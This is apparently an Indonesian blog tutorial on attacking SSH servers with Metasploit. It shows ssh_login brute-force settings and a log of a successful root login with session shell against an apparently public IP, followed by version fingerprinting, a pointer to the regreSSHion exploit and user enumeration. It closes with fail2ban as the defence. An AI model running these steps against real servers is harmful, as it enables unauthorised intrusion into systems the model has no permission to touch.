×

Brute Force Login SSH dengan scanner/ssh/ssh_login

Brute Force Login SSH dengan scanner/ssh/ssh_login

104 Views

SSH (Secure Shell) adalah protokol jaringan yang digunakan untuk mengamankan komunikasi antara dua sistem, terutama dalam lingkungan yang tidak aman, seperti internet. SSH memungkinkan pengguna untuk melakukan akses jarak jauh ke sistem lain, mengelola file, dan mengeksekusi perintah melalui jaringan dengan cara yang aman. Protokol ini banyak digunakan oleh administrator sistem dan pengembang untuk mengelola server, router, dan perangkat jaringan lainnya.

Fitur Utama SSH:

  1. Keamanan: SSH mengenkripsi semua data yang ditransmisikan antara klien dan server, termasuk perintah, file, dan data lain, sehingga melindungi dari intersepsi oleh pihak ketiga.
  2. Autentikasi: SSH mendukung beberapa metode autentikasi, seperti password, kunci publik, dan otentikasi berbasis sertifikat.
  3. Pengelolaan Jarak Jauh: SSH memungkinkan pengelolaan sistem jarak jauh melalui baris perintah atau terminal grafis (misalnya dengan X11 forwarding).
  4. Port Forwarding: SSH mendukung tunneling atau port forwarding, memungkinkan pengguna untuk mengamankan lalu lintas dari protokol yang tidak terenkripsi.
  5. Transfer File Aman: Protokol SCP (Secure Copy) dan SFTP (SSH File Transfer Protocol) digunakan untuk mengirim dan menerima file dengan aman melalui SSH.

Beberapa modul untuk pentest di kali linux (msfconsole) seperti ssh_login, ssh_version, ssh_enumusers bisa kita gunakan untuk mengetahui sejauh mana server ssh aman dari serangan.

Brute Force Login SSH

Brute force login ssh bisa menggunakan modul scanner/ssh/ssh_login tapi sebaiknya sudah mendapatkan username nya sehingga kita tinggal menyiapkan pass_file name nya. Berikut contoh settingan yang akan kita gunakan untuk melakukan exploit.

Basic options:
  Name              Current Setting              Required  Description
  ----              ---------------              --------  -----------
  ANONYMOUS_LOGIN   false                        yes       Attempt to login with a blank username and password
  BLANK_PASSWORDS   false                        no        Try blank passwords for all users
  BRUTEFORCE_SPEED  5                            yes       How fast to bruteforce, from 0 to 5
  CreateSession     true                         no        Create a new session for every successful login
  DB_ALL_CREDS      false                        no        Try each user/password couple stored in the current database
  DB_ALL_PASS       false                        no        Add all passwords in the current database to the list
  DB_ALL_USERS      false                        no        Add all users in the current database to the list
  DB_SKIP_EXISTING  none                         no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
  PASSWORD                                       no        A specific password to authenticate with
  PASS_FILE         /Users/user/Desktop/pwd.txt  no        File containing passwords, one per line
  RHOSTS            103.170.210.160              yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
  RPORT             22                           yes       The target port
  STOP_ON_SUCCESS   true                         yes       Stop guessing when a credential works for a host
  THREADS           1                            yes       The number of concurrent threads (max one per host)
  USERNAME          root                         no        A specific username to authenticate as
  USERPASS_FILE                                  no        File containing users and passwords separated by space, one pair per line
  USER_AS_PASS      false                        no        Try the username as the password for all users
  USER_FILE                                      no        File containing usernames, one per line
  VERBOSE           true                         yes       Whether to print output for all attempts

hasil ketika berhasil

msf6 auxiliary(scanner/ssh/ssh_login) > run

[*] 103.175.220.161:22 - Starting bruteforce
[-] 103.175.220.161:22 - Failed: 'bejopamungkas:565656565'
[!] No active DB -- Credential data will not be saved!
[-] 103.175.220.161:22 - Failed: 'root:sdsdsdsds'
[-] 103.175.220.161:22 - Failed: 'root:Password'
[-] 103.175.220.161:22 - Failed: 'root:http'
[-] 103.175.220.161:22 - Failed: 'root:factory'
[-] 103.175.220.161:22 - Failed: 'root:RIP000'
[-] 103.175.220.161:22 - Failed: 'root:12345'
[-] 103.175.220.161:22 - Failed: 'root:1234admin'
[-] 103.175.220.161:22 - Failed: 'root:ANYCOM'
[-] 103.175.220.161:22 - Failed: 'root:ILMI'
[+] 103.175.220.161:22 - Success: 'root:rootadmin' 'uid=1000(root) gid=1000(root) groups=1000(root),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),118(netdev),119(lxd) '
[*] SSH session 1 opened (192.168.0.102:49955 -> 103.170.210.160:22) at 2024-09-19 08:58:26 +0700
[-] 103.170.210.160:22 - While a session may have opened, it may be bugged.  If you experience issues with it, re-run this module with 'set gatherproof false'.  Also consider submitting an issue at github.com/rapid7/metasploit-framework with device details so it can be handled in the future.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Get Version SSH Server

Kita juga bisa mengumpulkan informasi mengenai version SSH server dengan menggunakan modul scanner/ssh/ssh_version). Contoh dengan settingan berikut

msf6 auxiliary(scanner/ssh/ssh_version) > info

       Name: SSH Version Scanner
     Module: auxiliary/scanner/ssh/ssh_version
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Daniel van Eeden <metasploit@myname.nl>
  h00die

Check supported:
  No

Basic options:
  Name             Current Setting  Required  Description
  ----             ---------------  --------  -----------
  EXTENDED_CHECKS  true             yes       Check for cryptographic issues
  RHOSTS           103.170.210.160  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
  RPORT            22               yes       The target port
  THREADS          1                yes       The number of concurrent threads (max one per host)
  TIMEOUT          30               yes       Timeout for the SSH probe

Description:
  Detect SSH Version, and the server encryption

References:
  https://en.wikipedia.org/wiki/SecureShell
  https://datatracker.ietf.org/doc/html/rfc8732#name-deprecated-algorithms
  https://datatracker.ietf.org/doc/html/draft-ietf-curdle-ssh-kex-sha2-20#page-16
  https://datatracker.ietf.org/doc/html/rfc8758#name-iana-considerations
  https://github.com/net-ssh/net-ssh?tab=readme-ov-file#supported-algorithms
  https://nvd.nist.gov/vuln/detail/CVE-2008-5161


View the full module info with the info -d command.

hasilnya kita dapat mendapatkan versi ssh servernya

msf6 auxiliary(scanner/ssh/ssh_version) > run

[*] 103.170.210.160 - Key Fingerprint: ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBDVFMVPOhhhzOeLgNXDtRGZJyxiOgjz2J0g5HUS8q+r
[*] 103.170.210.160 - SSH server version: SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.10
[*] 103.170.210.160 - Server Information and Encryption
=================================

  Type                     Value                                 Note
  ----                     -----                                 ----
  encryption.compression   none
  encryption.compression   zlib@openssh.com
  encryption.encryption    aes256-gcm@openssh.com
  encryption.encryption    chacha20-poly1305@openssh.com
  encryption.encryption    aes128-ctr
  encryption.encryption    aes256-ctr
  encryption.encryption    aes192-ctr
  encryption.encryption    aes128-gcm@openssh.com
  encryption.hmac          hmac-sha1-etm@openssh.com
  encryption.hmac          umac-128@openssh.com
  encryption.hmac          hmac-sha2-256
  encryption.hmac          hmac-sha2-512
  encryption.hmac          hmac-sha1
  encryption.hmac          umac-128-etm@openssh.com
  encryption.hmac          hmac-sha2-256-etm@openssh.com
  encryption.hmac          hmac-sha2-512-etm@openssh.com
  encryption.hmac          umac-64@openssh.com
  encryption.hmac          umac-64-etm@openssh.com
  encryption.host_key      rsa-sha2-512
  encryption.host_key      rsa-sha2-256
  encryption.host_key      ecdsa-sha2-nistp256                   Weak elliptic curve
  encryption.host_key      ssh-ed25519
  encryption.key_exchange  diffie-hellman-group18-sha512
  encryption.key_exchange  curve25519-sha256
  encryption.key_exchange  curve25519-sha256@libssh.org
  encryption.key_exchange  ecdh-sha2-nistp256
  encryption.key_exchange  ecdh-sha2-nistp384
  encryption.key_exchange  ecdh-sha2-nistp521
  encryption.key_exchange  sntrup761x25519-sha512@openssh.com
  encryption.key_exchange  diffie-hellman-group-exchange-sha256
  encryption.key_exchange  diffie-hellman-group16-sha512
  encryption.key_exchange  diffie-hellman-group14-sha256
  encryption.key_exchange  kex-strict-s-v00@openssh.com
  fingerprint_db           ssh.banner
  openssh.comment          Ubuntu-3ubuntu0.10
  os.certainty             0.75
  os.cpe23                 cpe:/o:canonical:ubuntu_linux:-
  os.family                Linux
  os.product               Linux
  os.vendor                Ubuntu
  service.cpe23            cpe:/a:openbsd:openssh:8.9p1
  service.family           OpenSSH
  service.product          OpenSSH
  service.protocol         ssh
  service.vendor           OpenBSD
  service.version          8.9p1

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Bila versi nya cocok, kita bisa menggunakan https://blog.bitnami.com/2024/07/regresshion-code-execution.html

See also  Membuat VPN Sendiri dengan OpenVPN

regreSSHion: Code Execution Vulnerability in OpenSSH server (CVE-2024-6387)

Kalian bisa menggunakan tools berikut untuk melakukan exploit nya.

Enum user

Untuk enum user bisa menggunakan modul scanner/ssh/ssh_enumusers namun kadang bisa berhasil atau tidak. https://github.com/rapid7/metasploit-framework/issues/15676

This technique will not work on modules which do not have public key authentication enabled.

Cara menanggulanginya

Untuk menanggulangi brute force bisa kita gunakan mekanisme try login attempts yaitu tools bernama fail2ban yang ditulis menggunakan bahasa python. Nanti tools tersebut akan membaca log login dan melakukan analisis untuk menentukan pemblokiran IP address jika melakukan kesalahan berkali-kali ketika login.

Akan dibahas selanjutnya mengenai fail2ban.

 

You May Have Missed